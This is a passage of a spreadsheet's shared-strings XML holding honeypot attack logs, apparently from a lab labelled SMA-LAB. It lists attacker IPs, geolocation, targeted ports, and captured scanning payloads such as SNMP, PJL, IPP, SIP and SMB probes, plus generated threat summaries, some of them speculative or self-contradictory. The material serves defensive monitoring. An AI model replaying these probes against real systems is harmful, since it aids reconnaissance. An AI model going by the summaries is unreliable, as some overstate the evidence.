The use of the default administrator account suggests potential malicious activity. &amp;&amp; An attempt was made to authenticate as Administrator using SMB protocol. This could be a reconnaissance or initial phase of an attack trying to gain access to the system. The attacker is likely trying to escalate privileges by assuming a high-level account. &amp;&amp; An incoming connection from an unknown IP address is attempting to access a service. This could be a scanning or probing activity, potentially leading to unauthorized access. It may indicate malicious intent. &amp;&amp; An incoming connection from an unknown IP address is attempting to access SMB service. This could be a potential attempt to exploit vulnerabilities or transfer malware. The source IP may be associated with malicious activity. &amp;&amp; An attempt was made to authenticate as Administrator using SMB protocol likely for unauthorized access or malicious purposes such as spreading malware or executing commands. This could be a precursor to more severe actions like lateral movement or data exfiltration. The use of the Administrator account suggests an effort to escalate privileges or exploit system vulnerabilities. &amp;&amp; The administrator account is attempting to authenticate with SMB service, which may indicate an unauthorized login attempt or brute force attack. 
This could be a malicious actor trying to gain access to the system using a privileged account.
A potential security incident is unfolding as the attacker attempts to leverage administrative credentials.</t>
  </si>
  <si>
    <t>Password Crack &amp;&amp; SMB Brute Force &amp;&amp; SMB Brute &amp;&amp; SMB Scanning</t>
  </si>
  <si>
    <t>2a8590c1bf39639542967b4b1c82f0db</t>
  </si>
  <si>
    <t>103.102.26.5</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;64704&amp;&amp;3306</t>
  </si>
  <si>
    <t>SN</t>
  </si>
  <si>
    <t>South Sulawesi</t>
  </si>
  <si>
    <t>Gowa Regency</t>
  </si>
  <si>
    <t>Sungguminasa</t>
  </si>
  <si>
    <t>1625863</t>
  </si>
  <si>
    <t>92111</t>
  </si>
  <si>
    <t>-5.20591</t>
  </si>
  <si>
    <t>119.452</t>
  </si>
  <si>
    <t>150283</t>
  </si>
  <si>
    <t>Dinas Komunikasi Informatika, Statistik dan Persandian Kabupaten Gowa</t>
  </si>
  <si>
    <t>Dinas Komunikasi Informatika</t>
  </si>
  <si>
    <t>2022-11-28</t>
  </si>
  <si>
    <t>IDNIC-DISKOMINFO-GOWA-ID</t>
  </si>
  <si>
    <t>::ffff:6766:1a05</t>
  </si>
  <si>
    <t>A SQL database is being scanned for vulnerabilities, potentially leading to unauthorized access or exploitation of security weaknesses. 
This activity suggests an attacker may be attempting to gain unauthorized access to sensitive data.
 Malicious scanning of database systems is a common tactic used in cyber attacks.</t>
  </si>
  <si>
    <t>e59221b04177e7e3ff77ab2a1a2fe7dc</t>
  </si>
  <si>
    <t>59.184.66.224</t>
  </si>
  <si>
    <t>CG</t>
  </si>
  <si>
    <t>Chhattisgarh</t>
  </si>
  <si>
    <t>Korba</t>
  </si>
  <si>
    <t>Katghora</t>
  </si>
  <si>
    <t>1267517</t>
  </si>
  <si>
    <t>22.5025</t>
  </si>
  <si>
    <t>82.5428</t>
  </si>
  <si>
    <t>::ffff:3bb8:42e0</t>
  </si>
  <si>
    <t>Unknown telnet connection attempt was detected, potentially a malicious probe or reconnaissance effort to identify active services.
The nature of this activity is exploratory and may be indicative of a larger attack strategy.
This could be the initial step in a more sinister attack on network assets. &amp;&amp; This log indicates that there was an attempt to connect to the Telnet service but it did not succeed as it returned NA, indicating no activity or no valid connection established. This could be due to a timeout or the connection being rejected possibly maliciously. It might suggest probing for vulnerabilities in the system.</t>
  </si>
  <si>
    <t>4dc4b64731f6d60f5ee55303f192d017</t>
  </si>
  <si>
    <t>194.187.176.27</t>
  </si>
  <si>
    <t>SMA-LAB_RDP_H2&amp;&amp;SMA-LAB_VNC_HC1</t>
  </si>
  <si>
    <t>3389&amp;&amp;5900&amp;&amp;161&amp;&amp;443&amp;&amp;445&amp;&amp;143&amp;&amp;631</t>
  </si>
  <si>
    <t>stshash&amp;&amp;connection&amp;&amp;query</t>
  </si>
  <si>
    <t>{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '194.233.76.135', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SMB:Incoming connection (194.187.176.27,50510)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.115.66:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.115.66:631/ipp|ATTR requested-attributes all'}}</t>
  </si>
  <si>
    <t>::ffff:c2bb:b01b</t>
  </si>
  <si>
    <t>The data suggests a malicious attempt to query printer attributes, possibly for reconnaissance or exploitation of the target system's print services.
This could be an initial scan before more severe attacks.
It may also indicate unauthorized access to sensitive printer settings and configurations. &amp;&amp; This data suggests an unauthorized attempt to retrieve information about a printer on the network, possibly as part of a reconnaissance or exploitation activity. The request is for detailed printer attributes, including location and capabilities. This could be indicative of a probing attack to identify vulnerable printers.</t>
  </si>
  <si>
    <t>IP Attack 
 Printer Hack</t>
  </si>
  <si>
    <t>d9339f06b36a479ac0b89effa66549a3</t>
  </si>
  <si>
    <t>59.180.160.4</t>
  </si>
  <si>
    <t>::ffff:3bb4:a004</t>
  </si>
  <si>
    <t>4141558122b4dd126a31f2d5a5f5c056</t>
  </si>
  <si>
    <t>77.171.229.196</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>1136</t>
  </si>
  <si>
    <t>KPN</t>
  </si>
  <si>
    <t>Kpn B.v.</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:4dab:e5c4</t>
  </si>
  <si>
    <t>c1875f8325f22ec47e260334599d1d7b</t>
  </si>
  <si>
    <t>208.109.11.76</t>
  </si>
  <si>
    <t>NA&amp;&amp;76.11.109.208.host.secureserver.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MSSQL_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;21548&amp;&amp;64367&amp;&amp;NA</t>
  </si>
  <si>
    <t>100-0001</t>
  </si>
  <si>
    <t>35.694</t>
  </si>
  <si>
    <t>139.754</t>
  </si>
  <si>
    <t>26496</t>
  </si>
  <si>
    <t>GoDaddy.com, LLC</t>
  </si>
  <si>
    <t>::ffff:d06d:b4c</t>
  </si>
  <si>
    <t>1fcbf78c04e31c1126af99b8bc3d9abd</t>
  </si>
  <si>
    <t>185.180.141.12</t>
  </si>
  <si>
    <t>zl-dala-us-gp1-wk121a.internet-census.org&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_IRC_H17&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_IRC_H8&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_DNS_H37&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_IRC_H10&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_IMAP_H3&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_POSTGRES_H2&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_SIP_H29&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_SIP_H36&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;6667&amp;&amp;6379&amp;&amp;21&amp;&amp;53&amp;&amp;39186&amp;&amp;1521&amp;&amp;161&amp;&amp;NA&amp;&amp;143&amp;&amp;43645&amp;&amp;5900&amp;&amp;389&amp;&amp;9100&amp;&amp;3389&amp;&amp;80&amp;&amp;23&amp;&amp;445&amp;&amp;110&amp;&amp;443&amp;&amp;42739</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;command&amp;&amp;login&amp;&amp;query&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'LMOB0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (185.180.141.12,50036)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_IRC:{'command': 'SSH-2.0-GO', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=185.180.141.12;rport=58762'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (185.180.141.12,60866)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 122.170.7.108:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:b9b4:8d0c</t>
  </si>
  <si>
    <t>04f87d12218d8121230e1ead58818fd4</t>
  </si>
  <si>
    <t>154.212.141.158</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;NA&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_SIP_H36&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_SIP_H8&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_PJL_H19&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_IMAP_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;80&amp;&amp;NA&amp;&amp;3306&amp;&amp;443&amp;&amp;5432&amp;&amp;9100&amp;&amp;25&amp;&amp;21&amp;&amp;3389&amp;&amp;110&amp;&amp;445&amp;&amp;23</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;query&amp;&amp;request&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.255.123.181:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 156.244.37.11:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.158,55392)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '203.29.241.98:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.158,37816)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.158,43982)}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.79.122:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 103.113.68.70:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.158;rport=53005'}}&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.158;rport=34955'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.158,55136)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (FHAGkLoH,)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.234.67.80:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '185.250.150.39:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '185.250.150.39:80', 'method': 'GET', 'uri': '/v1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/version'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/v1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '149.102.153.168:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 185.250.150.39:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8d9e</t>
  </si>
  <si>
    <t>No POP3 connections were made to the monitored service, indicating a potential lack of malicious activity via this service. &amp;&amp; No available log data provided for analysis.</t>
  </si>
  <si>
    <t>007815f2bf080a2e9397985bb5c234a0</t>
  </si>
  <si>
    <t>117.233.174.133</t>
  </si>
  <si>
    <t>::ffff:75e9:ae85</t>
  </si>
  <si>
    <t>e0b079392763802378654dbb3ed264b3</t>
  </si>
  <si>
    <t>206.217.206.106</t>
  </si>
  <si>
    <t>IA</t>
  </si>
  <si>
    <t>Iowa</t>
  </si>
  <si>
    <t>Dickinson</t>
  </si>
  <si>
    <t>Arnolds Park</t>
  </si>
  <si>
    <t>4847187</t>
  </si>
  <si>
    <t>51331</t>
  </si>
  <si>
    <t>43.3727</t>
  </si>
  <si>
    <t>-95.1239</t>
  </si>
  <si>
    <t>13213</t>
  </si>
  <si>
    <t>UK2NET-AS</t>
  </si>
  <si>
    <t>UK-2 Limited</t>
  </si>
  <si>
    <t>Hosting Services, Inc.</t>
  </si>
  <si>
    <t>::ffff:ced9:ce6a</t>
  </si>
  <si>
    <t>b8c6d2ec098843fa37feaf6e2b5e2c85</t>
  </si>
  <si>
    <t>117.215.173.91</t>
  </si>
  <si>
    <t>::ffff:75d7:ad5b</t>
  </si>
  <si>
    <t>30752decbed4d83cd7510cfc919a471c</t>
  </si>
  <si>
    <t>103.69.23.185</t>
  </si>
  <si>
    <t>Bengaluru (Jaladarsini Layout)</t>
  </si>
  <si>
    <t>13.0292</t>
  </si>
  <si>
    <t>77.5719</t>
  </si>
  <si>
    <t>135724</t>
  </si>
  <si>
    <t>PVTABNL-AS</t>
  </si>
  <si>
    <t>Allnet Broadband Network PVT LTD</t>
  </si>
  <si>
    <t>Allnet Broadband Network Pvt Ltd</t>
  </si>
  <si>
    <t>::ffff:6745:17b9</t>
  </si>
  <si>
    <t>91f1d4c106f3d2d77259d1b659479657</t>
  </si>
  <si>
    <t>103.199.195.122</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>Satara</t>
  </si>
  <si>
    <t>1257055</t>
  </si>
  <si>
    <t>17.6859</t>
  </si>
  <si>
    <t>73.9933</t>
  </si>
  <si>
    <t>17665</t>
  </si>
  <si>
    <t>ONEOTT INTERTAINMENT LIMITED</t>
  </si>
  <si>
    <t>ONEOTT iNTERTAINMENT LIMITED</t>
  </si>
  <si>
    <t>Oneott Intertainment Limited</t>
  </si>
  <si>
    <t>IMCL-IN</t>
  </si>
  <si>
    <t>::ffff:67c7:c37a</t>
  </si>
  <si>
    <t>5ae8cc2dd30366ee07bf69b7d776f7c5</t>
  </si>
  <si>
    <t>27.54.170.38</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_SOCKS5_H45&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>22&amp;&amp;36228&amp;&amp;22&amp;&amp;445&amp;&amp;80&amp;&amp;1080&amp;&amp;443&amp;&amp;389&amp;&amp;5900&amp;&amp;46390&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>None&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:1b36:aa26</t>
  </si>
  <si>
    <t>This indicates an attempted connection to a MySQL service without any actual data being sent or received, suggesting a potential reconnaissance or scanning activity by an attacker trying to identify vulnerabilities. The lack of any data exchange makes it difficult to determine the purpose of the attempt. It could be a probe for potential exploitation.</t>
  </si>
  <si>
    <t>983d7c7b6e1f8c504aab122e469a735a</t>
  </si>
  <si>
    <t>59.180.139.66</t>
  </si>
  <si>
    <t>::ffff:3bb4:8b42</t>
  </si>
  <si>
    <t>This log indicates an incoming connection attempt via telnet service, but no further action was taken indicating potential probing or reconnaissance activity. 
The lack of data suggests the connection was either closed immediately or not fully established.
No malicious activity was detected in this instance. &amp;&amp; No TELNET activity was detected, suggesting potential evasion or avoidance of TELNET-based attacks. This could be an attempt to blend in with legitimate traffic. The lack of TELNET activity might indicate a sophisticated attacker avoiding standard monitoring methods.</t>
  </si>
  <si>
    <t>1bd28155e9a936d1f7237784595fe303</t>
  </si>
  <si>
    <t>210.245.94.97</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_LDAP_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;47666&amp;&amp;389&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:d2f5:5e61</t>
  </si>
  <si>
    <t>The attacker is likely scanning for open ports and services on a network, attempting to identify potential entry points for further exploitation. &amp;&amp; No LDAP activity was detected during this time period, which could indicate that an attacker attempted to exploit or scan for LDAP vulnerabilities but was unsuccessful. This lack of activity may also suggest that the system is not configured to use LDAP or is not actively listening for LDAP connections.</t>
  </si>
  <si>
    <t xml:space="preserve"> Portscanner/Probe Scanner</t>
  </si>
  <si>
    <t>3dac07a169e88740edb55dfc857ec809</t>
  </si>
  <si>
    <t>115.96.64.164</t>
  </si>
  <si>
    <t>19.0728</t>
  </si>
  <si>
    <t>72.8826</t>
  </si>
  <si>
    <t>::ffff:7360:40a4</t>
  </si>
  <si>
    <t>39ea841663e9697fcddcb25b9076d278</t>
  </si>
  <si>
    <t>45.164.177.4</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;abuse.ch&amp;&amp;SMA-LAB_TELNET_H2</t>
  </si>
  <si>
    <t>::ffff:2da4:b104</t>
  </si>
  <si>
    <t>None&amp;&amp;C-U&amp;&amp;C-I_D</t>
  </si>
  <si>
    <t>9590abb2b62a691fe7e4a4e81e9b6a62</t>
  </si>
  <si>
    <t>122.176.36.219</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;5900&amp;&amp;87&amp;&amp;NA</t>
  </si>
  <si>
    <t>South East</t>
  </si>
  <si>
    <t>New Delhi (Okhla)</t>
  </si>
  <si>
    <t>110020</t>
  </si>
  <si>
    <t>28.5317</t>
  </si>
  <si>
    <t>77.2766</t>
  </si>
  <si>
    <t>::ffff:7ab0:24db</t>
  </si>
  <si>
    <t>Possible malicious activity: An attempt to exploit Microsoft SQL Server vulnerability, indicating potential unauthorized database access or injection.
This indicates that an attacker is trying to gain control over the database by exploiting its vulnerabilities.
It may be a precursor to further malicious activities such as data theft. &amp;&amp; There is insufficient log data to analyze for possible malicious activity. &amp;&amp; No log data provided, therefore I have nothing to analyze or describe.</t>
  </si>
  <si>
    <t>45d645a47a54234709623518d0d3cd73</t>
  </si>
  <si>
    <t>217.154.81.118</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H3</t>
  </si>
  <si>
